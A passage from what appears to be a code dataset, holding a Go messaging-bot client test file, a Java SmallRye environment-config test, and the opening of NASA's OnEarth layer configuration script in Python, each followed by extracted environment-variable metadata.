Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
data, status, err := c.MessageSend(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data.MessageID)
}
func TestMgClient_MessageSendTextWithSuggestions(t *testing.T) {
c := client()
i := uint64(1)
message := MessageSendRequest{
Type: MsgTypeText,
Scope: "public",
Content: "test message with suggestions",
ChatID: i,
TransportAttachments: &TransportAttachments{
Suggestions: []Suggestion{
{
Type: SuggestionTypeText,
Title: "text suggestion",
},
{Type: SuggestionTypeEmail},
{Type: SuggestionTypePhone},
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
data, status, err := c.MessageSend(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data.MessageID)
}
func TestMgClient_MessageSendProduct(t *testing.T) {
c := client()
message := MessageSendRequest{
Type: MsgTypeProduct,
ChatID: 5,
Scope: "public",
Product: &MessageProduct{
ID: 1,
Name: "Some Product",
Article: "Art-111",
Url: "https://example.com",
Img: "http://example.com/pic.jpg",
Cost: &MessageOrderCost{
Value: 29900,
Currency: "rub",
},
Quantity: &MessageOrderQuantity{
Value: 1,
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
msg, _, err := c.MessageSend(message)
if err != nil {
t.Errorf("%v", err)
}
assert.NoError(t, err)
t.Logf("%v", msg)
}
func TestMgClient_MessageSendOrder(t *testing.T) {
c := client()
message := MessageSendRequest{
Type: MsgTypeOrder,
ChatID: 5,
Scope: "public",
Order: &MessageOrder{
Number: RandStringBytesMaskImprSrc(7),
Cost: &MessageOrderCost{
Value: 29900,
Currency: MsgCurrencyRub,
},
Status: &MessageOrderStatus{
Code: MsgOrderStatusCodeNew,
Name: "Новый",
},
Delivery: &MessageOrderDelivery{
Name: "Курьерская доставка",
Address: "г. Москва, Проспект Мира, 9",
Price: &MessageOrderCost{
Value: 1100,
Currency: MsgCurrencyRub,
},
},
Items: []MessageOrderItem{
{
Name: "iPhone 6",
Url: "https://example.com/product.html",
Img: "https://example.com/picture.png",
Price: &MessageOrderCost{
Value: 29900,
Currency: MsgCurrencyRub,
},
Quantity: &MessageOrderQuantity{
Value: 1,
},
},
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
msg, _, err := c.MessageSend(message)
if err != nil {
t.Errorf("%v", err)
}
assert.NoError(t, err)
t.Logf("%v", msg)
}
func TestMgClient_RandomStringGenerator(t *testing.T) {
rnd := RandStringBytesMaskImprSrc(7)
assert.NotEmpty(t, rnd)
t.Logf("%v", rnd)
}
func TestMgClient_MessageEdit(t *testing.T) {
c := client()
message := MessageEditRequest{
ID: uint64(1),
Content: "test",
}
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/messages/1").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
e, status, err := c.MessageEdit(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
t.Logf("Message edit: %v", e)
}
func TestMgClient_MessageDelete(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Delete("/api/bot/v1/messages/1").
Reply(200).
BodyString(`{}`)
d, status, err := c.MessageDelete(1)
if err != nil {
t.Errorf("%d %v", status, err)
}
t.Logf("Message delete: %v", d)
}
func TestMgClient_Info(t *testing.T) {
c := client()
req := InfoRequest{Name: "AWESOME", Avatar: "https://test.com/awesome_bot_avatar"}
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/my/info").
JSON(req).
Reply(200).
BodyString(`{}`)
_, status, err := c.Info(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
}
func TestMgClient_Commands(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/my/commands").
Reply(200).
BodyString(`[{"id": 1, "name": "command_name", "description": "Command description", "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := CommandsRequest{}
data, status, err := c.Commands(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, command := range data {
assert.NotEmpty(t, command.Description)
}
}
func TestMgClient_CommandEditDelete(t *testing.T) {
c := client()
req := CommandEditRequest{
Name: "test_command",
Description: "Test command",
}
defer gock.Off()
gock.New(mgURL).
Put("/api/bot/v1/my/commands/test_command").
JSON(req).
Reply(200).
BodyString(`{"id": 1, "name": "test_command", "description": "Test description"}`)
n, status, err := c.CommandEdit(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, n.ID)
gock.New(mgURL).
Delete("/api/bot/v1/my/commands/test_command").
Reply(200).
BodyString(`{}`)
d, status, err := c.CommandDelete(n.Name)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
t.Logf("%v", d)
}
func TestMgClient_WsMeta(t *testing.T) {
c := client()
events := []string{"user_updated", "user_join_chat"}
url, headers, err := c.WsMeta(events)
if err != nil {
t.Errorf("%v", err)
}
resUrl := fmt.Sprintf("%s%s%s%s", strings.Replace(c.URL, "https", "wss", 1), prefix, "/ws?events=", strings.Join(events[:], ","))
resToken := c.Token
assert.Equal(t, resUrl, url)
assert.Equal(t, resToken, headers["X-Bot-Token"][0])
}
func TestMgClient_UploadFile(t *testing.T) {
c := client()
resp, err := http.Get("https://via.placeholder.com/300")
if err != nil {
t.Errorf("%v", err)
}
defer resp.Body.Close()
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/files/upload").
Reply(200).
BodyString(`{"created_at": "2018-01-01T00:00:00.000000Z", "hash": "hash", "id": "1"}`)
data, status, err := c.UploadFile(resp.Body)
if status != http.StatusOK {
t.Errorf("%v", err)
}
t.Logf("File %+v is upload", data)
}
func TestMgClient_UploadFileByUrl(t *testing.T) {
c := client()
file := UploadFileByUrlRequest{
Url: "https://via.placeholder.com/300",
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/files/upload_by_url").
JSON(file).
Reply(200).
BodyString(`{"created_at": "2018-01-01T00:00:00.000000Z", "hash": "hash", "id": "1"}`)
uploadFileResponse, st, err := c.UploadFileByURL(file)
if st != http.StatusOK {
t.Errorf("%v", err)
}
t.Logf("File %+v is upload", uploadFileResponse.ID)
assert.NoError(t, err)
}
func RandStringBytesMaskImprSrc(n int) string {
b := make([]byte, n)
// A src.Int63() generates 63 random bits, enough for letterIdxMax characters!
for i, cache, remain := n-1, src.Int63(), letterIdxMax; i >= 0; {
if remain == 0 {
cache, remain = src.Int63(), letterIdxMax
}
if idx := int(cache & letterIdxMask); idx < len(letterBytes) {
b[i] = letterBytes[idx]
i--
}
cache >>= letterIdxBits
remain--
}
return string(b)
}
func TestMgClient_DebugNoLogger(t *testing.T) {
c := client()
c.Debug = true
var buf bytes.Buffer
log.SetOutput(&buf)
defer func() {
log.SetOutput(os.Stderr)
}()
c.writeLog("Test log string")
assert.Contains(t, buf.String(), "Test log string")
}
func TestMgClient_DebugWithLogger(t *testing.T) {
var buf bytes.Buffer
logger := log.New(&buf, "Custom log prefix ", 0)
c := client()
c.Debug = true
c.WithLogger(logger)
c.writeLog("Test log string")
assert.Contains(t, buf.String(), "Custom log prefix Test log string")
}
|
[
"\"DEVELOPER_NODE\"",
"\"DEBUG\""
] |
[] |
[
"DEBUG",
"DEVELOPER_NODE"
] |
[]
|
["DEBUG", "DEVELOPER_NODE"]
|
go
| 2 | 0 | |
implementation/src/test/java/io/smallrye/config/EnvConfigSourceTest.java
|
/*
* Copyright 2017 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.config;
import static java.util.stream.Collectors.toList;
import static java.util.stream.StreamSupport.stream;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.util.NoSuchElementException;
import java.util.stream.StreamSupport;
import org.eclipse.microprofile.config.spi.ConfigSource;
import org.junit.jupiter.api.Test;
/**
* @author <a href="http://jmesnil.net/">Jeff Mesnil</a> (c) 2018 Red Hat inc.
*/
class EnvConfigSourceTest {
@Test
void conversionOfEnvVariableNames() {
String envProp = System.getenv("SMALLRYE_MP_CONFIG_PROP");
assertNotNull(envProp);
ConfigSource cs = new EnvConfigSource();
assertEquals(envProp, cs.getValue("SMALLRYE_MP_CONFIG_PROP"));
// the config source returns only the name of the actual env variable
assertTrue(cs.getPropertyNames().contains("SMALLRYE_MP_CONFIG_PROP"));
assertEquals(envProp, cs.getValue("smallrye_mp_config_prop"));
assertFalse(cs.getPropertyNames().contains("smallrye_mp_config_prop"));
assertEquals(envProp, cs.getValue("smallrye.mp.config.prop"));
assertFalse(cs.getPropertyNames().contains("smallrye.mp.config.prop"));
assertEquals(envProp, cs.getValue("SMALLRYE.MP.CONFIG.PROP"));
assertFalse(cs.getPropertyNames().contains("SMALLRYE.MP.CONFIG.PROP"));
assertEquals(envProp, cs.getValue("smallrye-mp-config-prop"));
assertFalse(cs.getPropertyNames().contains("smallrye-mp-config-prop"));
assertEquals(envProp, cs.getValue("SMALLRYE-MP-CONFIG-PROP"));
assertFalse(cs.getPropertyNames().contains("SMALLRYE-MP-CONFIG-PROP"));
assertEquals("1234", cs.getValue("smallrye_mp_config_prop_lower"));
assertTrue(cs.getPropertyNames().contains("smallrye_mp_config_prop_lower"));
}
@Test
void profileEnvVariables() {
assertNotNull(System.getenv("SMALLRYE_MP_CONFIG_PROP"));
assertNotNull(System.getenv("_ENV_SMALLRYE_MP_CONFIG_PROP"));
SmallRyeConfig config = new SmallRyeConfigBuilder().addDefaultSources().withProfile("env").build();
assertEquals("5678", config.getRawValue("smallrye.mp.config.prop"));
}
@Test
void empty() {
SmallRyeConfig config = new SmallRyeConfigBuilder().addDefaultSources().build();
assertThrows(NoSuchElementException.class, () -> config.getValue("SMALLRYE_MP_CONFIG_EMPTY", String.class));
assertTrue(
stream(config.getPropertyNames().spliterator(), false).collect(toList()).contains("SMALLRYE_MP_CONFIG_EMPTY"));
ConfigSource envConfigSource = StreamSupport.stream(config.getConfigSources().spliterator(), false)
.filter(configSource -> configSource.getName().equals("EnvConfigSource"))
.findFirst()
.get();
assertEquals("", envConfigSource.getValue("SMALLRYE_MP_CONFIG_EMPTY"));
}
@Test
void ordinal() {
SmallRyeConfig config = new SmallRyeConfigBuilder().withSources(new EnvConfigSource()).build();
ConfigSource configSource = config.getConfigSources().iterator().next();
assertTrue(configSource instanceof EnvConfigSource);
assertEquals(configSource.getOrdinal(), 301);
}
}
|
[
"\"SMALLRYE_MP_CONFIG_PROP\"",
"\"SMALLRYE_MP_CONFIG_PROP\"",
"\"_ENV_SMALLRYE_MP_CONFIG_PROP\""
] |
[] |
[
"_ENV_SMALLRYE_MP_CONFIG_PROP",
"SMALLRYE_MP_CONFIG_PROP"
] |
[]
|
["_ENV_SMALLRYE_MP_CONFIG_PROP", "SMALLRYE_MP_CONFIG_PROP"]
|
java
| 2 | 0 | |
src/layer_config/bin/oe_configure_layer.py
|
#!/bin/env python
# Copyright (c) 2002-2017, California Institute of Technology.
# All rights reserved. Based on Government Sponsored Research under contracts NAS7-1407 and/or NAS7-03001.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the California Institute of Technology (Caltech), its operating division the Jet Propulsion Laboratory (JPL),
# the National Aeronautics and Space Administration (NASA), nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE CALIFORNIA INSTITUTE OF TECHNOLOGY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# oe_configure_layer.py
# The OnEarth Layer Configurator.
#
#
# Example XML configuration file:
#
'''
<?xml version="1.0" encoding="UTF-8"?>
<LayerConfiguration>
<Identifier>MODIS_Aqua_Cloud_Top_Temp_Night</Identifier>
<Title>MODIS AQUA Nighttime Cloud Top Temperature</Title>
<FileNamePrefix>MYR6CTTLLNI</FileNamePrefix>
<TiledGroupName>MODIS AQUA Nighttime Cloud Top Temperature tileset</TiledGroupName>
<Compression>PNG</Compression>
<TileMatrixSet>EPSG4326_2km</TileMatrixSet>
<EmptyTileSize offset="0">1397</EmptyTileSize>
<Projection>EPSG:4326</Projection>
<EnvironmentConfig>/layer_config/conf/environment_geographic.xml</EnvironmentConfig>
<ArchiveLocation static="false" year="true">/data/EPSG4326/MYR6CTTLLNI</ArchiveLocation>
<ColorMap>http://localhost/colormap/sample.xml</ColorMap>
<Time>DETECT</Time>
<Time>2014-04-01/DETECT/P1D</Time>
</LayerConfiguration>
'''
#
# Global Imagery Browse Services
# NASA Jet Propulsion Laboratory
import os
import subprocess
import sys
import urllib
import urllib2
import xml.dom.minidom
import logging
import shutil
import re
import distutils.spawn
import sqlite3
import glob
import json
from datetime import datetime, timedelta
from time import asctime, time as tm
from dateutil.relativedelta import relativedelta
from optparse import OptionParser
from lxml import etree
import cgi
from oe_configure_reproject_layer import build_reproject_configs, make_gdal_tms_xml, \
WMS_LAYER_GROUP_TEMPLATE, DIMENSION_TEMPLATE, VALIDATION_TEMPLATE, STYLE_TEMPLATE, MAPFILE_TEMPLATE
from oe_configure_remote_layers import get_remote_layers
from oe_utils import Environment, get_environment, sigevent, log_info_mssg, log_info_mssg_with_timestamp, log_the_command, bulk_replace
reload(sys)
sys.setdefaultencoding('utf8')
versionNumber = '1.3.8'
current_conf = None
class WMTSEndPoint:
"""End point data for WMTS"""
def __init__(self, path, cacheConfigLocation, cacheConfigBasename,
getCapabilities, projection):
self.path = path
self.cacheConfigLocation = cacheConfigLocation
self.cacheConfigBasename = cacheConfigBasename
self.getCapabilities = getCapabilities
self.projection = projection
class TWMSEndPoint:
"""End point data for TWMS"""
def __init__(self, path, cacheConfigLocation, cacheConfigBasename,
getCapabilities, getTileService, projection):
self.path = path
self.cacheConfigLocation = cacheConfigLocation
self.cacheConfigBasename = cacheConfigBasename
self.getCapabilities = getCapabilities
self.getTileService = getTileService
self.projection = projection
class WMSEndPoint:
"""End point data for WMS"""
def __init__(self, mapfileStagingLocation, mapfileLocation,
mapfileLocationBasename, mapfileConfigLocation,
mapfileConfigBasename):
self.mapfileStagingLocation = mapfileStagingLocation
self.mapfileLocation = mapfileLocation
self.mapfileLocationBasename = mapfileLocationBasename
self.mapfileConfigLocation = mapfileConfigLocation
self.mapfileConfigBasename = mapfileConfigBasename
class Projection:
"""Projection information for layer"""
def __init__(self, projection_id, projection_wkt, projection_bbox,
projection_tilematrixsets, projection_tilematrixset_xml,
projection_lowercorner, projection_uppercorner):
self.id = projection_id
self.wkt = projection_wkt
self.bbox_xml = projection_bbox
self.tilematrixsets = projection_tilematrixsets #returns TileMatrixSetMeta
self.tilematrixset_xml = projection_tilematrixset_xml
self.lowercorner = projection_lowercorner
self.uppercorner = projection_uppercorner
class TileMatrixSetMeta:
"""TileMatrixSet metadata for WMTS"""
def __init__(self, levels, scale):
self.levels = levels
self.scale = scale
warnings = []
errors = []
def log_sig_warn(mssg, sigevent_url):
"""
Send a warning to the log and to sigevent.
Arguments:
mssg -- 'message for operations'
sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Send to log.
logging.warning(asctime() + " " + mssg)
global warnings
warnings.append(asctime() + " " + mssg)
# Send to sigevent.
try:
sigevent('WARN', mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
def log_sig_err(mssg, sigevent_url):
"""
Send a warning to the log and to sigevent.
Arguments:
mssg -- 'message for operations'
sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Send to log.
logging.error(asctime() + " " + mssg)
global errors
errors.append(asctime() + " " + mssg)
# Send to sigevent.
try:
sigevent('ERROR', mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
def log_sig_exit(type, mssg, sigevent_url):
"""
Send a message to the log, to sigevent, and then exit.
Arguments:
type -- 'INFO', 'WARN', 'ERROR'
mssg -- 'message for operations'
sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Add "Exiting" to mssg.
mssg = str().join([mssg, ' Exiting oe_configure_layer.'])
# Send to sigevent.
try:
sigevent(type, mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
# Send to log.
if type == 'INFO':
log_info_mssg_with_timestamp(mssg)
elif type == 'WARN':
logging.warning(asctime())
logging.warning(mssg)
elif type == 'ERROR':
logging.error(asctime())
logging.error(mssg)
# Exit.
sys.exit()
def get_dom_tag_value(dom, tag_name):
"""
Return value of a tag from dom (XML file).
Arguments:
tag_name -- name of dom tag for which the value should be returned.
"""
tag = dom.getElementsByTagName(tag_name)
value = tag[0].firstChild.nodeValue.strip()
return value
def change_dom_tag_value(dom, tag_name, value):
"""
Return value of a tag from dom (XML file).
Arguments:
tag_name -- name of dom tag for which the value should be returned.
value -- the replacement value.
"""
tag = dom.getElementsByTagName(tag_name)
tag[0].firstChild.nodeValue = value
def run_command(cmd, sigevent_url):
"""
Runs the provided command on the terminal.
Arguments:
cmd -- the command to be executed.
"""
print '\nRunning command: ' + cmd
process = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
for output in process.stdout:
print output.strip()
for error in process.stderr:
log_sig_err(error.strip(), sigevent_url)
raise Exception(error.strip())
def add_trailing_slash(directory_path):
"""
Add trailing slash if one is not already present.
Argument:
directory_path -- path to which trailing slash should be confirmed.
"""
# Add trailing slash.
if directory_path[-1] != '/':
directory_path = str().join([directory_path, '/'])
# Return directory_path with trailing slash.
return directory_path
def get_pretty_xml(xml_dom):
"""
Formats an XML document into a string with nice-looking line-breaks (for get_mrf).
"""
parser = etree.XMLParser(strip_cdata=False)
xml = etree.fromstring(xml_dom.toxml(), parser)
pretty_xml = etree.tostring(xml, pretty_print=True)
return pretty_xml
def delete_mapfile_layer(mapfile, layerName):
"""
Deletes a LAYER entry from a Mapfile.
"""
mapfile.seek(0)
endTagCount = None
bytePosition = 0
layerFound = False
for line in mapfile.readlines():
# Record byte position of LAYER tag in case we're about to find that it's a dupe
if 'layer' in line.lower():
layerStart = bytePosition
# If this is a duplicate tag, start counting END tags
if all(tag in line.lower() for tag in ('name', identifier)):
endTagCount = 1
# Increment the END count if additional tags that require an END appear
if endTagCount > 0 and any(keyword in line.lower()
for keyword in ('validation', 'projection',
'metadata')):
endTagCount += 1
# Decrement the END count each time an END tag is found
if endTagCount > 0 and "end" in line.lower():
endTagCount -= 1
# Increment the overall file position
bytePosition += len(line)
# When last END tag is found, record the position of the final line and push LAYER start and end positions to list
if endTagCount == 0:
mapfile.seek(bytePosition)
remainder = mapfile.read()
mapfile.seek(layerStart)
mapfile.truncate()
mapfile.write(remainder)
layerFound = True
break
return layerFound
def get_archive(archive_root, archive_configuration):
"""
Gets archive location from an archive configuration file based on the archive root ID.
Arguments:
archive_root -- the key used for the archive
archive_configuration -- the location of the archive configuration file
"""
try:
# Open file.
archive_config = open(archive_configuration, 'r')
print('Using archive config: ' + archive_configuration)
except IOError:
mssg = str().join([
'Cannot read archive configuration file: ', archive_configuration
])
log_sig_exit('ERROR', mssg, sigevent_url)
location = ""
dom = xml.dom.minidom.parse(archive_config)
archiveElements = dom.getElementsByTagName('Archive')
for archiveElement in archiveElements:
if str(archiveElement.attributes['id'].
value).lower() == archive_root.lower():
location = archiveElement.getElementsByTagName(
'Location')[0].firstChild.data.strip()
print "Archive location: " + location + " \n"
if location == "":
log_sig_err(
'Archive "' + archive_root + '" not found in ' +
archive_configuration, sigevent_url)
return location
def get_tmslimits(tmsLimitId, tmslimits_configuration):
"""
Gets TileMatrixSetLimits from a TileMatrixSetLimits configuration file based on the limit ID.
Arguments:
tmsLimitId -- the id of the TileMatrixSetLimit
tmslimits_configuration -- the location of the TileMatrixSetLimits configuration file
"""
try:
# Open file.
tmsLimits_config = open(tmslimits_configuration, 'r')
print('Using TileMatrixSetLimits config: ' + tmslimits_configuration)
except IOError:
raise ValueError(str().join([
'ERROR: Cannot read TileMatrixSetLimits configuration file: ',
tmslimits_configuration
]))
tmsLimits = None
dom = xml.dom.minidom.parse(tmsLimits_config)
tmsLimitElements = dom.getElementsByTagName('TileMatrixSetLimits')
for limitsElem in tmsLimitElements:
if limitsElem.getAttribute('id') == tmsLimitId:
tmsLimits = limitsElem
break
if not tmsLimits:
raise ValueError('ERROR: TileMatrixSetLimits ID "' + tmsLimitId +
'" not found in ' + tmslimits_configuration)
tmsLimits.removeAttribute('id')
return tmsLimits
def get_projection(projectionId, projectionConfig, lcdir,
tilematrixset_configuration):
"""
Gets projection metadata from a projection configuration file based on the projection ID.
Arguments:
projectionId -- the name of the projection and key used
projectionConfig -- the location of the projection configuration file
"""
try:
# Open file.
projection_config = open(projectionConfig, 'r')
print('Using projection config: ' + projectionConfig + '\n')
except IOError:
mssg = str().join(
['Cannot read projection configuration file: ', projectionConfig])
log_sig_exit('ERROR', mssg, sigevent_url)
dom = xml.dom.minidom.parse(projection_config)
projection = None
projectionTags = dom.getElementsByTagName('Projection')
for projectionElement in projectionTags:
if projectionElement.attributes['id'].value == projectionId:
wkt = projectionElement.getElementsByTagName(
'WKT')[0].firstChild.data.strip()
try:
wgsbbox = projectionElement.getElementsByTagName(
'WGS84BoundingBox')[0].toxml().replace(
"WGS84BoundingBox", "ows:WGS84BoundingBox")
except:
wgsbbox = ""
try:
boundbox = "\n " + projectionElement.getElementsByTagName(
'BoundingBox')[0].toxml().replace("BoundingBox",
"ows:BoundingBox")
except:
boundbox = ""
bbox = str(wgsbbox + boundbox).replace(
"LowerCorner", "ows:LowerCorner").replace(
"UpperCorner", "ows:UpperCorner")
# get corners...a bit messy
lowercorner = xml.dom.minidom.parseString(
"<bbox>" + str(boundbox + wgsbbox).replace("ows:", "") +
"</bbox>").getElementsByTagName(
'LowerCorner')[0].firstChild.nodeValue.split(" ")
uppercorner = xml.dom.minidom.parseString(
"<bbox>" + str(boundbox + wgsbbox).replace("ows:", "") +
"</bbox>").getElementsByTagName(
'UpperCorner')[0].firstChild.nodeValue.split(" ")
tilematrixsets = {}
try:
# Open file.
tilematrixsetconfig = open(tilematrixset_configuration, 'r')
print('Using TileMatrixSet config: ' +
tilematrixset_configuration + '\n')
except IOError:
mssg = str().join([
'Cannot read TileMatrixSet configuration file: ',
tilematrixset_configuration
])
log_sig_exit('ERROR', mssg, sigevent_url)
tms_dom = xml.dom.minidom.parse(tilematrixsetconfig)
tms_projections = tms_dom.getElementsByTagName('Projection')
tms_xml = ""
for tms_projection in tms_projections:
try:
if tms_projection.attributes['id'].value == projectionId:
tms_xml = '\n'.join(tms_projection.toxml().split(
'\n')[1:-1]) # remove <Projection> lines
tms_xml = re.sub(
r'<TileMatrixSet level="\d+">', '<TileMatrixSet>',
tms_xml) # remove added level metadata
tileMatrixSetElements = tms_projection.getElementsByTagName(
'TileMatrixSet')
for tilematrixset in tileMatrixSetElements:
scale_denominators = tilematrixset.getElementsByTagName(
"ScaleDenominator")
if scale_denominators.length > 1:
scale = int(
round(
float(scale_denominators[0].firstChild.
nodeValue.strip()) /
float(scale_denominators[1].firstChild.
nodeValue.strip())))
else:
scale = 2 # default to powers of 2 scale
print "TileMatrixSet: " + tilematrixset.getElementsByTagName(
'ows:Identifier'
)[0].firstChild.nodeValue.strip(
) + " - levels: " + str(
tilematrixset.getElementsByTagName(
"TileMatrix").
length) + ", overview scale: " + str(scale)
tilematrixsets[tilematrixset.getElementsByTagName(
'ows:Identifier')[0].firstChild.nodeValue.
strip()] = TileMatrixSetMeta(
tilematrixset.
getElementsByTagName(
"TileMatrix").length, scale)
except KeyError, e:
log_sig_exit(
'ERROR', 'Projection ' + projectionId + " " + str(e) +
' missing in TileMatrixSet configuration ' +
tilematrixset_configuration, sigevent_url)
projection = Projection(projectionId, wkt, bbox, tilematrixsets,
tms_xml, lowercorner, uppercorner)
if projection == None:
mssg = "Projection " + projectionId + " could not be found in projection configuration file."
raise Exception(mssg)
return projection
def detect_time(time, archiveLocation, fileNamePrefix, year, has_zdb):
"""
Checks time element to see if start or end time must be detected on the file system.
Arguments:
time -- the time element (DETECT) keyword is utilized
archiveLocation -- the location of the archive data
fileNamePrefix -- the prefix of the MRF files
year -- whether or not the layer uses a year-based directory structure
has_zdb -- whether or not the layer contains a zdb file
"""
times = []
print "\nAssessing time", time
time = time.upper()
detect = "DETECT"
period = "P1D"
period_value = 1 # numeric value of period
archiveLocation = add_trailing_slash(archiveLocation)
subdaily = False
if not os.path.isdir(archiveLocation):
message = archiveLocation + " is not a valid location"
log_sig_err(message, sigevent_url)
return times
if (time == detect or time == ''
or time.startswith(detect + '/P')) and has_zdb == False:
#detect everything including breaks in date
dates = []
if year == True:
filesearch = archiveLocation + '/[0-9]*/*[idx,shp,json]'
if len(glob.glob(filesearch)
) == 0: # No files, maybe 'year' not specified correctly
filesearch = archiveLocation + '/*[idx,shp,json]'
else:
filesearch = archiveLocation + '/*[idx,shp,json]'
for f in glob.glob(filesearch):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
period = "PT24H"
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
dates = sorted(list(set(dates)))
# DEBUG: Print the entire list of dates found for the product
#for testdate in dates:
# print datetime.strftime(testdate,"%Y-%m-%dT%H:%M:%SZ")
# Get period, attempt to figure out period (in days) if none
if time.startswith(detect + '/P'):
period = time.split('/')[1]
else:
if len(
dates
) > 3: #check if the difference between first three dates are the same
if subdaily == False:
diff1 = abs((dates[0] - dates[1]).days)
diff2 = abs((dates[1] - dates[2]).days)
diff3 = abs((dates[2] - dates[3]).days)
if diff1 == diff2 == diff3:
period = "P" + str(diff1) + "D"
elif 31 in [diff1, diff2, diff3]:
period = "P1M"
if 365 in [diff1, diff2, diff3]:
period = "P1Y"
else:
diff1 = abs((dates[0] - dates[1]))
diff2 = abs((dates[1] - dates[2]))
diff3 = abs((dates[2] - dates[3]))
if diff1 == diff2 == diff3:
if diff1.seconds % 3600 == 0:
period = "PT" + str(diff1.seconds / 3600) + "H"
elif diff1.seconds % 60 == 0:
period = "PT" + str(diff1.seconds / 60) + "M"
else:
period = "PT" + str(diff1.seconds) + "S"
message = "No period in time configuration for " + fileNamePrefix + " - detected " + period
log_sig_warn(message, sigevent_url)
print "Using period " + str(period)
try:
if subdaily == False:
period_value = int(period[1:-1])
else:
period_value = int(period[2:-1])
except ValueError:
log_sig_err(
"Mixed period values are not supported on server: " + period,
sigevent_url)
# Search for date ranges
if len(dates) == 0:
message = "No files with dates found for '" + fileNamePrefix + "' in '" + archiveLocation + "' - please check if data exists."
log_sig_err(message, sigevent_url)
startdate = datetime.now() # default to now
else:
startdate = min(dates)
print "Start of data " + datetime.strftime(startdate,
"%Y-%m-%dT%H:%M:%SZ")
enddate = startdate # set end date to start date for lone dates
for i, d in enumerate(dates):
# print d
if period[-1] == "W":
